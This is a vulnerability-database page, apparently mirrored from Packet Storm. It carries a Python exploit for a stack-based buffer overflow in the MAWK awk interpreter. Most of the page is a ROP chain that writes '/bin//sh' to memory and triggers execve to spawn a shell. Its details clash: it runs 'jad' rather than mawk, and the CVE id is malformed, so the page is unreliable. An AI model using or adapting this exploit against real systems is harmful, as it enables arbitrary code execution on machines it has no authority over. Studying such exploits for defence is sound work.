Lucene search
K

MAWK 1.3.3-17 Buffer Overflow

🗓️ 24 Jul 2017 00:00:00Reported by Juan SaccoType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 21 Views

MAWK Buffer Overflow CVE-2017-921

Code
`#!/usr/bin/python  
# Developed using Exploit Pack - http://exploitpack.com -  
<[email protected]>  
# Exploit Author: Juan Sacco <[email protected]> at KPN Red Team -  
http://www.kpn.com  
# Tested on: GNU/Linux - Kali 2017.1 Release  
#  
# Description: MAWK ( AWK Interpreter ) 1.3.3-17 and prior is prone to  
a stack-based buffer overflow  
# vulnerability because the application fails to perform adequate  
boundary-checks on user-supplied input.  
#  
# Program affected: mawk is an interpreter for the AWK Programming  
Language. The AWK language is useful  
# for manipulation of data files, text retrieval and processing, and  
for prototyping and experimenting with algorithms.  
#  
# An attacker could exploit this vulnerability to execute arbitrary code in the  
# context of the application. Failed exploit attempts will result in a  
# denial-of-service condition.  
#  
import os, subprocess  
from struct import pack  
  
ropchain = "A"*1038 # junk  
ropchain += pack('<I', 0x080e9101) # pop edx ; pop ebx ; pop esi ; pop  
edi ; pop ebp ; ret  
ropchain += pack('<I', 0x0811abe0) # @ .data  
ropchain += pack('<I', 0x41414141) # padding  
ropchain += pack('<I', 0x41414141) # padding  
ropchain += pack('<I', 0x41414141) # padding  
ropchain += pack('<I', 0x41414141) # padding  
ropchain += pack('<I', 0x0807b744) # pop eax ; ret  
ropchain += '/bin'  
ropchain += pack('<I', 0x0810ae08) # mov dword ptr [edx], eax ; pop  
ebx ; pop ebp ; ret  
ropchain += pack('<I', 0x41414141) # padding  
ropchain += pack('<I', 0x41414141) # padding  
ropchain += pack('<I', 0x080e9101) # pop edx ; pop ebx ; pop esi ; pop  
edi ; pop ebp ; ret  
ropchain += pack('<I', 0x0811abe4) # @ .data + 4  
ropchain += pack('<I', 0x41414141) # padding  
ropchain += pack('<I', 0x41414141) # padding  
ropchain += pack('<I', 0x41414141) # padding  
ropchain += pack('<I', 0x41414141) # padding  
ropchain += pack('<I', 0x0807b744) # pop eax ; ret  
ropchain += '//sh'  
ropchain += pack('<I', 0x0810ae08) # mov dword ptr [edx], eax ; pop  
ebx ; pop ebp ; ret  
ropchain += pack('<I', 0x41414141) # padding  
ropchain += pack('<I', 0x41414141) # padding  
ropchain += pack('<I', 0x080e9101) # pop edx ; pop ebx ; pop esi ; pop  
edi ; pop ebp ; ret  
ropchain += pack('<I', 0x0811abe8) # @ .data + 8  
ropchain += pack('<I', 0x41414141) # padding  
ropchain += pack('<I', 0x41414141) # padding  
ropchain += pack('<I', 0x41414141) # padding  
ropchain += pack('<I', 0x41414141) # padding  
ropchain += pack('<I', 0x080b4970) # xor eax, eax ; pop esi ; pop ebp ; ret  
ropchain += pack('<I', 0x41414141) # padding  
ropchain += pack('<I', 0x41414141) # padding  
ropchain += pack('<I', 0x0810ae08) # mov dword ptr [edx], eax ; pop  
ebx ; pop ebp ; ret  
ropchain += pack('<I', 0x41414141) # padding  
ropchain += pack('<I', 0x41414141) # padding  
ropchain += pack('<I', 0x080dcf4b) # pop ebx ; pop esi ; pop edi ; ret  
ropchain += pack('<I', 0x0811abe0) # @ .data  
ropchain += pack('<I', 0x41414141) # padding  
ropchain += pack('<I', 0x41414141) # padding  
ropchain += pack('<I', 0x08067b43) # pop ecx ; ret  
ropchain += pack('<I', 0x0811abe8) # @ .data + 8  
ropchain += pack('<I', 0x080e9101) # pop edx ; pop ebx ; pop esi ; pop  
edi ; pop ebp ; ret  
ropchain += pack('<I', 0x0811abe8) # @ .data + 8  
ropchain += pack('<I', 0x0811abe0) # padding without overwrite ebx  
ropchain += pack('<I', 0x41414141) # padding  
ropchain += pack('<I', 0x41414141) # padding  
ropchain += pack('<I', 0x41414141) # padding  
ropchain += pack('<I', 0x080b4970) # xor eax, eax ; pop esi ; pop ebp ; ret  
ropchain += pack('<I', 0x41414141) # padding  
ropchain += pack('<I', 0x41414141) # padding  
ropchain += pack('<I', 0x080e571f) # inc eax ; ret  
ropchain += pack('<I', 0x080e571f) # inc eax ; ret  
ropchain += pack('<I', 0x080e571f) # inc eax ; ret  
ropchain += pack('<I', 0x080e571f) # inc eax ; ret  
ropchain += pack('<I', 0x080e571f) # inc eax ; ret  
ropchain += pack('<I', 0x080e571f) # inc eax ; ret  
ropchain += pack('<I', 0x080e571f) # inc eax ; ret  
ropchain += pack('<I', 0x080e571f) # inc eax ; ret  
ropchain += pack('<I', 0x080e571f) # inc eax ; ret  
ropchain += pack('<I', 0x080e571f) # inc eax ; ret  
ropchain += pack('<I', 0x080e571f) # inc eax ; ret  
ropchain += pack('<I', 0x080c861f) # int 0x80  
  
try:  
print("[*] MAWK 1.3.3 Stack-Based Buffer Overflow by Juan Sacco")  
print("[*] Please wait.. running")  
subprocess.call(["jad", ropchain])  
except OSError as e:  
if e.errno == os.errno.ENOENT:  
print "MAWK not found!"  
else:  
print "Error executing exploit"  
raise  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

24 Jul 2017 00:00Current
0.5Low risk
Vulners AI Score0.5
21